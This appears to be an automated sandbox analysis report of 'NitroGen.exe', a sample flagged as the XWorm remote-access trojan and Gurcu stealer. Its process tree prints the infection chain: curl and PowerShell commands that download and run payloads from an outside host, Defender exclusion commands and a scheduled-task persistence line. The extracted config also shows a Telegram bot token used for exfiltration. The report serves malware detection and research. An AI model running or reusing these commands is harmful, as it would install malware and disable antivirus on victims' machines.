gurcu | afccdbb4d2be91d5b8de74fb8a0b4cb8b6f217808fcf6e1c8722fd2c8e01446c

Analysis

max time kernel
57s
max time network
59s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
25-11-2024 04:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NitroGen.exe
Size

244KB
MD5

ba199a53400605e0dddec76f0bbb5d4f
SHA1

81182bc28677dd07a8731d196244fb9643bde827
SHA256

f273e967b289bf3c275aae486b8a49918a136c332fce84986417aac2f65d3a6a
SHA512

578b6ac9bad24da3811239c8346e7d8fd33e2e3b1a322dddb829ce6336b5683421913f4dc8a12190d404ac8aa86129458b6ff3c24911a54986a485a61da815eb
SSDEEP

1536:Grae78zjORCDGwfdCSog01313Rys5gCqbReEi0j+Rf21D2k:+ahKyd2n31F53/EAM2k

Score

10^/10

gurcu xworm execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/mDSLGN9q
telegram
https://api.telegram.org/bot7168105056:AAGVK3B7ZFupxq4PpmnBpxAQOwJ5CUp76ow/sendMessage?chat_id=1992635040

Extracted

Family

gurcu

https://api.telegram.org/bot7168105056:AAGVK3B7ZFupxq4PpmnBpxAQOwJ5CUp76ow/sendMessage?chat_id=1992635040

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\svchost.exe	family_xworm
behavioral1/memory/3412-36-0x0000000000F20000-0x0000000000F3C000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

23 2172 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1876 powershell.exe
2172 powershell.exe
2348 powershell.exe
232 powershell.exe
844 powershell.exe
2868 powershell.exe
Downloads MZ/PE file

flow	pid	process
23	2172	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe

Executes dropped EXE 2 IoCs

Processes:

svchost.exesvchost.exe

pid process

3412 svchost.exe
2472 svchost.exe

pid	process
3412	svchost.exe
2472	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

NitroGen.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NitroGen.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

37 pastebin.com
38 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

24 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
37	pastebin.com
38	pastebin.com

flow	ioc
24	ip-api.com

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies registry class 2 IoCs

Processes:

cmd.exetaskmgr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings	taskmgr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

1604 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

svchost.exe

pid process

3412 svchost.exe

pid	process
1604	schtasks.exe

pid	process
3412	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exepowershell.exesvchost.exe

pid	process
1876	powershell.exe
1876	powershell.exe
2172	powershell.exe
2172	powershell.exe
2348	powershell.exe
2348	powershell.exe
224	taskmgr.exe
224	taskmgr.exe
232	powershell.exe
232	powershell.exe
232	powershell.exe
224	taskmgr.exe
224	taskmgr.exe
844	powershell.exe
844	powershell.exe
844	powershell.exe
224	taskmgr.exe
2868	powershell.exe
2868	powershell.exe
2868	powershell.exe
224	taskmgr.exe
3412	svchost.exe
3412	svchost.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exesvchost.exepowershell.exetaskmgr.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeIncreaseQuotaPrivilege	1876	powershell.exe
Token: SeSecurityPrivilege	1876	powershell.exe
Token: SeTakeOwnershipPrivilege	1876	powershell.exe
Token: SeLoadDriverPrivilege	1876	powershell.exe
Token: SeSystemProfilePrivilege	1876	powershell.exe
Token: SeSystemtimePrivilege	1876	powershell.exe
Token: SeProfSingleProcessPrivilege	1876	powershell.exe
Token: SeIncBasePriorityPrivilege	1876	powershell.exe
Token: SeCreatePagefilePrivilege	1876	powershell.exe
Token: SeBackupPrivilege	1876	powershell.exe
Token: SeRestorePrivilege	1876	powershell.exe
Token: SeShutdownPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeSystemEnvironmentPrivilege	1876	powershell.exe
Token: SeRemoteShutdownPrivilege	1876	powershell.exe
Token: SeUndockPrivilege	1876	powershell.exe
Token: SeManageVolumePrivilege	1876	powershell.exe
Token: 33	1876	powershell.exe
Token: 34	1876	powershell.exe
Token: 35	1876	powershell.exe
Token: 36	1876	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	3412	svchost.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeIncreaseQuotaPrivilege	2348	powershell.exe
Token: SeSecurityPrivilege	2348	powershell.exe
Token: SeTakeOwnershipPrivilege	2348	powershell.exe
Token: SeLoadDriverPrivilege	2348	powershell.exe
Token: SeSystemProfilePrivilege	2348	powershell.exe
Token: SeSystemtimePrivilege	2348	powershell.exe
Token: SeProfSingleProcessPrivilege	2348	powershell.exe
Token: SeIncBasePriorityPrivilege	2348	powershell.exe
Token: SeCreatePagefilePrivilege	2348	powershell.exe
Token: SeBackupPrivilege	2348	powershell.exe
Token: SeRestorePrivilege	2348	powershell.exe
Token: SeShutdownPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeSystemEnvironmentPrivilege	2348	powershell.exe
Token: SeRemoteShutdownPrivilege	2348	powershell.exe
Token: SeUndockPrivilege	2348	powershell.exe
Token: SeManageVolumePrivilege	2348	powershell.exe
Token: 33	2348	powershell.exe
Token: 34	2348	powershell.exe
Token: 35	2348	powershell.exe
Token: 36	2348	powershell.exe
Token: SeDebugPrivilege	224	taskmgr.exe
Token: SeSystemProfilePrivilege	224	taskmgr.exe
Token: SeCreateGlobalPrivilege	224	taskmgr.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeIncreaseQuotaPrivilege	232	powershell.exe
Token: SeSecurityPrivilege	232	powershell.exe
Token: SeTakeOwnershipPrivilege	232	powershell.exe
Token: SeLoadDriverPrivilege	232	powershell.exe
Token: SeSystemProfilePrivilege	232	powershell.exe
Token: SeSystemtimePrivilege	232	powershell.exe
Token: SeProfSingleProcessPrivilege	232	powershell.exe
Token: SeIncBasePriorityPrivilege	232	powershell.exe
Token: SeCreatePagefilePrivilege	232	powershell.exe
Token: SeBackupPrivilege	232	powershell.exe
Token: SeRestorePrivilege	232	powershell.exe
Token: SeShutdownPrivilege	232	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeSystemEnvironmentPrivilege	232	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe
224	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

svchost.exe

pid process

3412 svchost.exe

pid	process
3412	svchost.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

NitroGen.execmd.exeWScript.execmd.exesvchost.exe

description	pid	process	target process
PID 4340 wrote to memory of 4276	4340	NitroGen.exe	cmd.exe
PID 4340 wrote to memory of 4276	4340	NitroGen.exe	cmd.exe
PID 4276 wrote to memory of 3880	4276	cmd.exe	curl.exe
PID 4276 wrote to memory of 3880	4276	cmd.exe	curl.exe
PID 4276 wrote to memory of 3048	4276	cmd.exe	curl.exe
PID 4276 wrote to memory of 3048	4276	cmd.exe	curl.exe
PID 4276 wrote to memory of 1664	4276	cmd.exe	WScript.exe
PID 4276 wrote to memory of 1664	4276	cmd.exe	WScript.exe
PID 1664 wrote to memory of 568	1664	WScript.exe	cmd.exe
PID 1664 wrote to memory of 568	1664	WScript.exe	cmd.exe
PID 568 wrote to memory of 1876	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 1876	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 2172	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 2172	568	cmd.exe	powershell.exe
PID 568 wrote to memory of 3412	568	cmd.exe	svchost.exe
PID 568 wrote to memory of 3412	568	cmd.exe	svchost.exe
PID 3412 wrote to memory of 2348	3412	svchost.exe	powershell.exe
PID 3412 wrote to memory of 2348	3412	svchost.exe	powershell.exe
PID 3412 wrote to memory of 232	3412	svchost.exe	powershell.exe
PID 3412 wrote to memory of 232	3412	svchost.exe	powershell.exe
PID 3412 wrote to memory of 844	3412	svchost.exe	powershell.exe
PID 3412 wrote to memory of 844	3412	svchost.exe	powershell.exe
PID 3412 wrote to memory of 2868	3412	svchost.exe	powershell.exe
PID 3412 wrote to memory of 2868	3412	svchost.exe	powershell.exe
PID 3412 wrote to memory of 1604	3412	svchost.exe	schtasks.exe
PID 3412 wrote to memory of 1604	3412	svchost.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
cURL User-Agent 2 IoCs
Uses User-Agent string associated with cURL utility.

Processes:

description flow ioc

HTTP User-Agent header 4 curl/8.7.1
HTTP User-Agent header 14 curl/8.7.1

description	flow	ioc
HTTP User-Agent header	4	curl/8.7.1
HTTP User-Agent header	14	curl/8.7.1

C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4340
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c main.bat
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4276
- - C:\Windows\system32\curl.exe
    curl "https://download.t3k.site/d/TKZb9w6VkHTZyX68SiFGSXTD4mJnGe2pfci7dxQOrMkT6Ys58THoTTOTEwSQ" -o installer.bat
    3⤵
    PID:3880
- - C:\Windows\system32\curl.exe
    curl "https://download.t3k.site/d/VM5Pb1HkPC4lGvDGlSx6uv8qU8NTIBUCeSGvPdsb7fvePGrDEjfhfc4dTCXl" -o run.vbs
    3⤵
    PID:3048
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\run.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c installer.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:568
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Set-MpPreference -ExclusionExtension exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        Powershell -Command "Invoke-Webrequest 'https://download.t3k.site/d/vRjJCJlmX67rqifdZJH928gmqpPY0zcSgTwsV6NkTNTMtGKkm1SsVymBQVDz' -OutFile 'svchost.exe'"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2172
    - - C:\Users\Admin\AppData\Roaming\svchost.exe
        
        .\svchost.exe
        5⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3412
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2348
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:232
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:844
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2868
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1604

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:3372

C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
1⤵
- Executes dropped EXE
PID:2472

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c67441dfa09f61bca500bb43407c56b8

SHA1
5a56cf7cbeb48c109e2128c31b681fac3959157b

SHA256
63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

SHA512
325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5a785dfd9ff5432f2ad05cf3920bbfe9

SHA1
cd72de58b0de639f4e0d2922da4b14c94e3944cc

SHA256
d4b89d1d6dcc28dbeaa40d4b695778aa0be24171fe7217c562a3269d94afbe75

SHA512
2527d15d839b4e4ecc7e580f721c8056b62ec4f073ad64ea8200193455f975ccc55e57618c695a6f9d6b091365788caa8793bef24cca5e133552bb0be92df5c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc66dd316d0c6eb6529306e194fceaed

SHA1
9d533147e960f89a22369fd687197da5fe099d07

SHA256
e0eda54576909267a84dd3d8d2f695fc5a4973fd7ec88352338f4cfe5fd6f41b

SHA512
9aad7c1d207ef42695e5e29abbbb51ba49eac43cc4b2a8d33cce858d4cf5a6e8b99c880e159bf6f1fc5fb2ff22466fb47c774521766ec9b11b0ae775d0bb99a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
112e1a85279fe2131a67e5e693aa96cc

SHA1
d9605a4a04976613da0575342207c1d51433c5bb

SHA256
9f28579fd3051f1f8cd189e22c6bd04c8a572dd171125d9b33610ee8b0998252

SHA512
d75dd93fc17d76abe8f59f5794948ff5ae6e54427d3fbc3f38d62ebd1a91ad1927638f6921d78d9dda99ac161ff8204ad331388448cb61b9061c4ae860b41623

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
598b69320ef706b945ff3a568323127a

SHA1
40848c25fbdeffa38b74b15e691ceec37a3042e8

SHA256
0a41cfbe75f656020328df4f385c0d689e2f48ab173f33010455cca9a07b8137

SHA512
e32d996efc78c352050ace009e9f95495a0bc64c8e3a7fa3ce445532fdb7ea486351468d6e197bfa891b10d87d97eecfb94e58a84a0141cb72c103c36893243a

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\main.bat

Filesize
256B

MD5
e262e5bd963c829357048858a2d64e04

SHA1
2884d6841512bc948a7daee268da91240faa3c13

SHA256
14fe35548160972a32833d45cd302460b39876ea26b7646f6b424c8654ce1b55

SHA512
694d507b078ddab1ad5cdb653f33507f716557609dff9a78e1091b7efde9093f5155d2bcd7e921a0ce581d6f3bd8fdd68b996452b956e7ceaa1d5c7dec5ce2de

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wrrgt2at.knq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\installer.bat

Filesize
257B

MD5
ae00757e6487b0c2ac116e09d5fd59c5

SHA1
3b4e7403b8934e8f31b68fbdff63fa063a91bd56

SHA256
57a777cf4a032ddc12d85b93fcbed6960608bb42e612b8ab224fbf5aff8f4f8e

SHA512
9431e99b9179fb2e33a5c227e9fc603e9c61b1db9f247b08c6b9874bb80b6510ff215c04e04ea9a77150307eb27c8dcc0dab4ce5f0757a13cdb5adbce9d98e15

Download Submit
C:\Users\Admin\AppData\Roaming\run.vbs

Filesize
134B

MD5
6d346aad37debed59b302c74a50d5ff7

SHA1
356bd92ec121ec0a3f4b1c12ef81ada47ebf6429

SHA256
b4033fe422e7f1a0351bac53c119321b6c90b6877e65fef4de17bbbba2a767f2

SHA512
58865078ebf065fa969bed3b26172101f67193aaf6e9e018aa87d46ec535f982739a7b4526ad78c72788f71dd6d63094add2837a3c610d8ca345da8eab254112

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
83KB

MD5
cf73759724ceaffa0353900bd428a555

SHA1
a62a68b7a2c0db839f05a763a9c5bda7b92f4709

SHA256
39d928ef59af8f60ad6ff7dc973cc3d00e3f6751d5fd3824c615c311b0a14da0

SHA512
d6340601e1a3ebda121390d55a3f2fbb6a1fd38e8fb51115823377f72087ef17409eafe41c182736c20b70ce25fabc1f83750112804b981c34d791c69e403e11

Download Submit
memory/224-59-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-66-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-58-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-70-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-69-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-68-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-67-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-60-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-65-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-64-0x0000020839650000-0x0000020839651000-memory.dmp

Filesize
4KB

Download
memory/224-97-0x0000020837B90000-0x0000020837BA0000-memory.dmp

Filesize
64KB

Download
memory/224-102-0x0000020837BE0000-0x0000020837BF0000-memory.dmp

Filesize
64KB

Download
memory/232-72-0x00000219C9960000-0x00000219C9B7D000-memory.dmp

Filesize
2.1MB

Download
memory/1876-17-0x000001DEFFED0000-0x000001DEFFEF2000-memory.dmp

Filesize
136KB

Download
memory/3412-36-0x0000000000F20000-0x0000000000F3C000-memory.dmp

Filesize
112KB

Download